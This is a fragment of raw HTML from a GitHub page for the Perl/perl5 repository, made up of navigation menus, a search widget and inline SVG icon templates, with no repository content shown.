class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"trending","context":"open_source","tag":"link","label":"trending_link_open_source_navbar"}" href="https://github.com/trending"> Trending </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{"location":"navbar","action":"collections","context":"open_source","tag":"link","label":"collections_link_open_source_navbar"}" href="https://github.com/collections"> Collections </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Enterprise <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path> </svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 pt-2 pt-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 pb-2 pb-lg-4 px-lg-4"> <div class="HeaderMenu-column"> <div class="border-bottom pb-3 pb-lg-0 pb-lg-3 mb-3 mb-lg-0 mb-lg-3"> <ul class="list-style-none f5" > <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"enterprise_platform","context":"enterprise","tag":"link","label":"enterprise_platform_link_enterprise_navbar"}" href="/enterprise"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-stack color-fg-subtle mr-3"> <path d="M11.063 1.456a1.749 1.749 0 0 1 1.874 0l8.383 5.316a1.751 1.751 0 0 1 0 2.956l-8.383 5.316a1.749 1.749 0 0 1-1.874 0L2.68 9.728a1.751 1.751 0 0 1 0-2.956Zm1.071 1.267a.25.25 0 0 0-.268 0L3.483 8.039a.25.25 0 0 0 0 .422l8.383 5.316a.25.25 0 0 0 .268 0l8.383-5.316a.25.25 0 0 0 0-.422Z"></path><path d="M1.867 12.324a.75.75 0 0 1 1.035-.232l8.964 5.685a.25.25 0 0 0 .268 0l8.964-5.685a.75.75 0 0 1 .804 1.267l-8.965 5.685a1.749 1.749 0 0 1-1.874 0l-8.965-5.685a.75.75 0 0 1-.231-1.035Z"></path><path d="M1.867 16.324a.75.75 0 0 1 1.035-.232l8.964 5.685a.25.25 0 0 0 .268 0l8.964-5.685a.75.75 0 0 1 .804 1.267l-8.965 5.685a1.749 1.749 0 0 1-1.874 0l-8.965-5.685a.75.75 0 0 1-.231-1.035Z"></path> </svg> <div> <div class="color-fg-default h4">Enterprise platform</div> AI-powered developer platform </div> </a></li> </ul> </div> <div class="border-bottom pb-3 pb-lg-0 border-bottom-0"> <span class="d-block h4 color-fg-default my-1" id="enterprise-available-add-ons-heading">Available add-ons</span> <ul class="list-style-none f5" aria-labelledby="enterprise-available-add-ons-heading"> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"github_advanced_security","context":"enterprise","tag":"link","label":"github_advanced_security_link_enterprise_navbar"}" href="https://github.com/security/advanced-security"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-shield-check color-fg-subtle mr-3"> <path d="M16.53 9.78a.75.75 0 0 0-1.06-1.06L11 13.19l-1.97-1.97a.75.75 0 0 0-1.06 1.06l2.5 2.5a.75.75 0 0 0 1.06 0l5-5Z"></path><path d="m12.54.637 8.25 2.675A1.75 1.75 0 0 1 22 4.976V10c0 6.19-3.771 10.704-9.401 12.83a1.704 1.704 0 0 1-1.198 0C5.77 20.705 2 16.19 2 10V4.976c0-.758.489-1.43 1.21-1.664L11.46.637a1.748 1.748 0 0 1 1.08 0Zm-.617 1.426-8.25 2.676a.249.249 0 0 0-.173.237V10c0 5.46 3.28 9.483 8.43 11.426a.199.199 0 0 0 .14 0C17.22 19.483 20.5 15.461 20.5 10V4.976a.25.25 0 0 0-.173-.237l-8.25-2.676a.253.253 0 0 0-.154 0Z"></path> </svg> <div> <div class="color-fg-default h4">GitHub Advanced Security</div> Enterprise-grade security features </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description pb-lg-3" data-analytics-event="{"location":"navbar","action":"copilot_for_business","context":"enterprise","tag":"link","label":"copilot_for_business_link_enterprise_navbar"}" href="/features/copilot/copilot-business"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M23.922 16.992c-.861 1.495-5.859 5.023-11.922 5.023-6.063 0-11.061-3.528-11.922-5.023A.641.641 0 0 1 0 16.736v-2.869a.841.841 0 0 1 .053-.22c.372-.935 1.347-2.292 2.605-2.656.167-.429.414-1.055.644-1.517a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.499 1.132-3.368.397-.406.89-.717 1.474-.952 1.399-1.136 3.392-2.093 6.122-2.093 2.731 0 4.767.957 6.166 2.093.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086.23.462.477 1.088.644 1.517 1.258.364 2.233 1.721 2.605 2.656a.832.832 0 0 1 .053.22v2.869a.641.641 0 0 1-.078.256ZM12.172 11h-.344a4.323 4.323 0 0 1-.355.508C10.703 12.455 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a2.005 2.005 0 0 1-.085-.104L4 11.741v6.585c1.435.779 4.514 2.179 8 2.179 3.486 0 6.565-1.4 8-2.179v-6.585l-.098-.104s-.033.045-.085.104c-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.545-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.016.016Zm.641-2.935c.136 1.057.403 1.913.878 2.497.442.544 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.15.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.319-.862-2.824-1.025-1.487-.161-2.192.138-2.533.529-.269.307-.437.808-.438 1.578v.021c0 .265.021.562.063.893Zm-1.626 0c.042-.331.063-.628.063-.894v-.02c-.001-.77-.169-1.271-.438-1.578-.341-.391-1.046-.69-2.533-.529-1.505.163-2.347.537-2.824 1.025-.462.472-.705 1.179-.705 2.319 0 1.211.175 1.926.558 2.361.365.414 1.084.751 2.657.751 1.21 0 1.902-.394 2.344-.938.475-.584.742-1.44.878-2.497Z"></path><path d="M14.5 14.25a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Zm-5 0a1 1 0 0 1 1 1v2a1 1 0 0 1-2 0v-2a1 1 0 0 1 1-1Z"></path> </svg> <div> <div class="color-fg-default h4">Copilot for business</div> Enterprise-grade AI features </div> </a></li> <li> <a class="HeaderMenu-dropdown-link d-block no-underline position-relative py-2 Link--secondary d-flex flex-items-center Link--has-description" data-analytics-event="{"location":"navbar","action":"premium_support","context":"enterprise","tag":"link","label":"premium_support_link_enterprise_navbar"}" href="/premium-support"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path> </svg> <div> <div class="color-fg-default h4">Premium Support</div> Enterprise-grade 24/7 support </div> </a></li> </ul> </div> </div> </div> </li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between flex-items-center d-block d-lg-flex flex-lg-nowrap flex-lg-items-center js-details-container js-header-menu-item"> <a class="HeaderMenu-link no-underline px-0 px-lg-2 py-3 py-lg-2 d-block d-lg-inline-block" data-analytics-event="{"location":"navbar","action":"pricing","context":"global","tag":"link","label":"pricing_link_global_navbar"}" href="https://github.com/pricing">Pricing</a> </li> </ul> </nav> <div class="d-flex flex-column flex-lg-row width-full flex-justify-end flex-lg-items-center text-center mt-3 mt-lg-0 text-lg-left ml-lg-3"> <qbsearch-input class="search-input" data-scope="repo:Perl/perl5" data-custom-scopes-path="/search/custom_scopes" data-delete-custom-scopes-csrf="lMTwmLXVWMrJ87J7KrQmvXSSU1PQzaUdLq4NkN8Z_Ku8m8bjFoKi89goWtPT7MIz7-CXOmfropZ5XqnQn862WQ" data-max-custom-scopes="10" data-header-redesign-enabled="false" data-initial-value="" data-blackbird-suggestions-path="/search/suggestions" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" data-current-repository="Perl/perl5" data-current-org="Perl" data-current-owner="" data-logged-in="false" data-copilot-chat-enabled="false" data-nl-search-enabled="false" data-retain-scroll-position="true"> <div class="search-input-container search-with-dialog position-relative d-flex flex-row flex-items-center mr-4 rounded" data-action="click:qbsearch-input#searchInputContainerClicked" > <button type="button" class="header-search-button placeholder input-button form-control d-flex flex-1 flex-self-stretch flex-items-center no-wrap width-full py-0 pl-2 pr-0 text-left border-0 box-shadow-none" data-target="qbsearch-input.inputButton" aria-label="Search or jump to…" aria-haspopup="dialog" placeholder="Search or jump to..." data-hotkey=s,/ autocapitalize="off" data-analytics-event="{"location":"navbar","action":"searchbar","context":"global","tag":"input","label":"searchbar_input_global_navbar"}" data-action="click:qbsearch-input#handleExpand" > <div class="mr-2 color-fg-muted"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path> </svg> </div> <span class="flex-1" data-target="qbsearch-input.inputButtonText">Search or jump to...</span> <div class="d-flex" data-target="qbsearch-input.hotkeyIndicator"> <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> </div> </button> <input type="hidden" name="type" class="js-site-search-type-field"> <div class="Overlay--hidden " data-modal-dialog-overlay> <modal-dialog data-action="close:qbsearch-input#handleClose cancel:qbsearch-input#handleClose" data-target="qbsearch-input.searchSuggestionsDialog" role="dialog" id="search-suggestions-dialog" aria-modal="true" aria-labelledby="search-suggestions-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto"> <h1 id="search-suggestions-dialog-header" class="sr-only">Search code, repositories, users, issues, pull requests...</h1> <div class="Overlay-body Overlay-body--paddingNone"> <div data-view-component="true"> <div class="search-suggestions position-fixed width-full color-shadow-large border color-fg-default color-bg-default overflow-hidden d-flex flex-column query-builder-container" style="border-radius: 12px;" data-target="qbsearch-input.queryBuilderContainer" hidden > <!-- '"` --><!-- </textarea></xmp> --></option></form><form id="query-builder-test-form" action="" accept-charset="UTF-8" method="get"> <query-builder data-target="qbsearch-input.queryBuilder" id="query-builder-query-builder-test" data-filter-key=":" data-view-component="true" class="QueryBuilder search-query-builder"> <div class="FormControl FormControl--fullWidth"> <label id="query-builder-test-label" for="query-builder-test" class="FormControl-label sr-only"> Search </label> <div class="QueryBuilder-StyledInput width-fit " data-target="query-builder.styledInput" > <span id="query-builder-test-leadingvisual-wrap" class="FormControl-input-leadingVisualWrap QueryBuilder-leadingVisualWrap"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search FormControl-input-leadingVisual"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path> </svg> </span> <div data-target="query-builder.styledInputContainer" class="QueryBuilder-StyledInputContainer"> <div aria-hidden="true" class="QueryBuilder-StyledInputContent" data-target="query-builder.styledInputContent" ></div> <div class="QueryBuilder-InputWrapper"> <div aria-hidden="true" class="QueryBuilder-Sizer" data-target="query-builder.sizer"></div> <input id="query-builder-test" name="query-builder-test" value="" autocomplete="off" type="text" role="combobox" spellcheck="false" aria-expanded="false" aria-describedby="validation-9f0e43c3-7256-46a8-86d4-1ce7b90c015a" data-target="query-builder.input" data-action=" input:query-builder#inputChange blur:query-builder#inputBlur keydown:query-builder#inputKeydown focus:query-builder#inputFocus " data-view-component="true" class="FormControl-input QueryBuilder-Input FormControl-medium" /> </div> </div> <span class="sr-only" id="query-builder-test-clear">Clear</span> <button role="button" id="query-builder-test-clear-button" aria-labelledby="query-builder-test-clear query-builder-test-label" data-target="query-builder.clearButton" data-action=" click:query-builder#clear focus:query-builder#clearButtonFocus blur:query-builder#clearButtonBlur " variant="small" hidden="hidden" type="button" data-view-component="true" class="Button Button--iconOnly Button--invisible Button--medium mr-1 px-2 py-0 d-flex flex-items-center rounded-1 color-fg-muted"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x-circle-fill Button-visual"> <path d="M2.343 13.657A8 8 0 1 1 13.658 2.343 8 8 0 0 1 2.343 13.657ZM6.03 4.97a.751.751 0 0 0-1.042.018.751.751 0 0 0-.018 1.042L6.94 8 4.97 9.97a.749.749 0 0 0 .326 1.275.749.749 0 0 0 .734-.215L8 9.06l1.97 1.97a.749.749 0 0 0 1.275-.326.749.749 0 0 0-.215-.734L9.06 8l1.97-1.97a.749.749 0 0 0-.326-1.275.749.749 0 0 0-.734.215L8 6.94Z"></path> </svg> </button> </div> <template id="search-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path> </svg> </template> <template id="code-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path> </svg> </template> <template id="file-code-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file-code"> <path d="M4 1.75C4 .784 4.784 0 5.75 0h5.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v8.586A1.75 1.75 0 0 1 14.25 15h-9a.75.75 0 0 1 0-1.5h9a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 10 4.25V1.5H5.75a.25.25 0 0 0-.25.25v2.5a.75.75 0 0 1-1.5 0Zm1.72 4.97a.75.75 0 0 1 1.06 0l2 2a.75.75 0 0 1 0 1.06l-2 2a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734l1.47-1.47-1.47-1.47a.75.75 0 0 1 0-1.06ZM3.28 7.78 1.81 9.25l1.47 1.47a.751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018l-2-2a.75.75 0 0 1 0-1.06l2-2a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Zm8.22-6.218V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path> </svg> </template> <template id="history-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path> </svg> </template> <template id="repo-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path> </svg> </template> <template id="bookmark-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bookmark"> <path d="M3 2.75C3 1.784 3.784 1 4.75 1h6.5c.966 0 1.75.784 1.75 1.75v11.5a.75.75 0 0 1-1.227.579L8 11.722l-3.773 3.107A.751.751 0 0 1 3 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v9.91l3.023-2.489a.75.75 0 0 1 .954 0l3.023 2.49V2.75a.25.25 0 0 0-.25-.25Z"></path> </svg> </template> <template id="plus-circle-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-plus-circle"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm7.25-3.25v2.5h2.5a.75.75 0 0 1 0 1.5h-2.5v2.5a.75.75 0 0 1-1.5 0v-2.5h-2.5a.75.75 0 0 1 0-1.5h2.5v-2.5a.75.75 0 0 1 1.5 0Z"></path> </svg> </template> <template id="circle-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-dot-fill"> <path d="M8 4a4 4 0 1 1 0 8 4 4 0 0 1 0-8Z"></path> </svg> </template> <template id="trash-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path d="M11 1.75V3h2.25a.75.75 0 0 1 0 1.5H2.75a.75.75 0 0 1 0-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75ZM4.496 6.675l.66 6.6a.25.25 0 0 0 .249.225h5.19a.25.25 0 0 0 .249-.225l.66-6.6a.75.75 0 0 1 1.492.149l-.66 6.6A1.748 1.748 0 0 1 10.595 15h-5.19a1.75 1.75 0 0 1-1.741-1.575l-.66-6.6a.75.75 0 1 1 1.492-.15ZM6.5 1.75V3h3V1.75a.25.25 0 0 0-.25-.25h-2.5a.25.25 0 0 0-.25.25Z"></path> </svg> </template> <template id="team-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-people"> <path d="M2 5.5a3.5 3.5 0 1 1 5.898 2.549 5.508 5.508 0 0 1 3.034 4.084.75.75 0 1 1-1.482.235 4 4 0 0 0-7.9 0 .75.75 0 0 1-1.482-.236A5.507 5.507 0 0 1 3.102 8.05 3.493 3.493 0 0 1 2 5.5ZM11 4a3.001 3.001 0 0 1 2.22 5.018 5.01 5.01 0 0 1 2.56 3.012.749.749 0 0 1-.885.954.752.752 0 0 1-.549-.514 3.507 3.507 0 0 0-2.522-2.372.75.75 0 0 1-.574-.73v-.352a.75.75 0 0 1 .416-.672A1.5 1.5 0 0 0 11 5.5.75.75 0 0 1 11 4Zm-5.5-.5a2 2 0 1 0-.001 3.999A2 2 0 0 0 5.5 3.5Z"></path> </svg> </template> <template id="project-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path> </svg> </template> <template id="pencil-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path d="M11.013 1.427a1.75 1.75 0 0 1 2.474 0l1.086 1.086a1.75 1.75 0 0 1 0 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 0 1-.927-.928l.929-3.25c.081-.286.235-.547.445-.758l8.61-8.61Zm.176 4.823L9.75 4.81l-6.286 6.287a.253.253 0 0 0-.064.108l-.558 1.953 1.953-.558a.253.253 0 0 0 .108-.064Zm1.238-3.763a.25.25 0 0 0-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 0 0 0-.354Z"></path> </svg> </template> <template id="copilot-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copilot"> <path d="M7.998 15.035c-4.562 0-7.873-2.914-7.998-3.749V9.338c.085-.628.677-1.686 1.588-2.065.013-.07.024-.143.036-.218.029-.183.06-.384.126-.612-.201-.508-.254-1.084-.254-1.656 0-.87.128-1.769.693-2.484.579-.733 1.494-1.124 2.724-1.261 1.206-.134 2.262.034 2.944.765.05.053.096.108.139.165.044-.057.094-.112.143-.165.682-.731 1.738-.899 2.944-.765 1.23.137 2.145.528 2.724 1.261.566.715.693 1.614.693 2.484 0 .572-.053 1.148-.254 1.656.066.228.098.429.126.612.012.076.024.148.037.218.924.385 1.522 1.471 1.591 2.095v1.872c0 .766-3.351 3.795-8.002 3.795Zm0-1.485c2.28 0 4.584-1.11 5.002-1.433V7.862l-.023-.116c-.49.21-1.075.291-1.727.291-1.146 0-2.059-.327-2.71-.991A3.222 3.222 0 0 1 8 6.303a3.24 3.24 0 0 1-.544.743c-.65.664-1.563.991-2.71.991-.652 0-1.236-.081-1.727-.291l-.023.116v4.255c.419.323 2.722 1.433 5.002 1.433ZM6.762 2.83c-.193-.206-.637-.413-1.682-.297-1.019.113-1.479.404-1.713.7-.247.312-.369.789-.369 1.554 0 .793.129 1.171.308 1.371.162.181.519.379 1.442.379.853 0 1.339-.235 1.638-.54.315-.322.527-.827.617-1.553.117-.935-.037-1.395-.241-1.614Zm4.155-.297c-1.044-.116-1.488.091-1.681.297-.204.219-.359.679-.242 1.614.091.726.303 1.231.618 1.553.299.305.784.54 1.638.54.922 0 1.28-.198 1.442-.379.179-.2.308-.578.308-1.371 0-.765-.123-1.242-.37-1.554-.233-.296-.693-.587-1.713-.7Z"></path><path d="M6.25 9.037a.75.75 0 0 1 .75.75v1.501a.75.75 0 0 1-1.5 0V9.787a.75.75 0 0 1 .75-.75Zm4.25.75v1.501a.75.75 0 0 1-1.5 0V9.787a.75.75 0 0 1 1.5 0Z"></path> </svg> </template> <template id="copilot-error-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copilot-error"> <path d="M16 11.24c0 .112-.072.274-.21.467L13 9.688V7.862l-.023-.116c-.49.21-1.075.291-1.727.291-.198 0-.388-.009-.571-.029L6.833 5.226a4.01 4.01 0 0 0 .17-.782c.117-.935-.037-1.395-.241-1.614-.193-.206-.637-.413-1.682-.297-.683.076-1.115.231-1.395.415l-1.257-.91c.579-.564 1.413-.877 2.485-.996 1.206-.134 2.262.034 2.944.765.05.053.096.108.139.165.044-.057.094-.112.143-.165.682-.731 1.738-.899 2.944-.765 1.23.137 2.145.528 2.724 1.261.566.715.693 1.614.693 2.484 0 .572-.053 1.148-.254 1.656.066.228.098.429.126.612.012.076.024.148.037.218.924.385 1.522 1.471 1.591 2.095Zm-5.083-8.707c-1.044-.116-1.488.091-1.681.297-.204.219-.359.679-.242 1.614.091.726.303 1.231.618 1.553.299.305.784.54 1.638.54.922 0 1.28-.198 1.442-.379.179-.2.308-.578.308-1.371 0-.765-.123-1.242-.37-1.554-.233-.296-.693-.587-1.713-.7Zm2.511 11.074c-1.393.776-3.272 1.428-5.43 1.428-4.562 0-7.873-2.914-7.998-3.749V9.338c.085-.628.677-1.686 1.588-2.065.013-.07.024-.143.036-.218.029-.183.06-.384.126-.612-.18-.455-.241-.963-.252-1.475L.31 4.107A.747.747 0 0 1 0 3.509V3.49a.748.748 0 0 1 .625-.73c.156-.026.306.047.435.139l14.667 10.578a.592.592 0 0 1 .227.264.752.752 0 0 1 .046.249v.022a.75.75 0 0 1-1.19.596Zm-1.367-.991L5.635 7.964a5.128 5.128 0 0 1-.889.073c-.652 0-1.236-.081-1.727-.291l-.023.116v4.255c.419.323 2.722 1.433 5.002 1.433 1.539 0 3.089-.505 4.063-.934Z"></path> </svg> </template> <template id="workflow-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-workflow"> <path d="M0 1.75C0 .784.784 0 1.75 0h3.5C6.216 0 7 .784 7 1.75v3.5A1.75 1.75 0 0 1 5.25 7H4v4a1 1 0 0 0 1 1h4v-1.25C9 9.784 9.784 9 10.75 9h3.5c.966 0 1.75.784 1.75 1.75v3.5A1.75 1.75 0 0 1 14.25 16h-3.5A1.75 1.75 0 0 1 9 14.25v-.75H5A2.5 2.5 0 0 1 2.5 11V7h-.75A1.75 1.75 0 0 1 0 5.25Zm1.75-.25a.25.25 0 0 0-.25.25v3.5c0 .138.112.25.25.25h3.5a.25.25 0 0 0 .25-.25v-3.5a.25.25 0 0 0-.25-.25Zm9 9a.25.25 0 0 0-.25.25v3.5c0 .138.112.25.25.25h3.5a.25.25 0 0 0 .25-.25v-3.5a.25.25 0 0 0-.25-.25Z"></path> </svg> </template> <template id="book-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book"> <path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path> </svg> </template> <template id="code-review-icon"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code-review"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v8.5A1.75 1.75 0 0 1 14.25 13H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 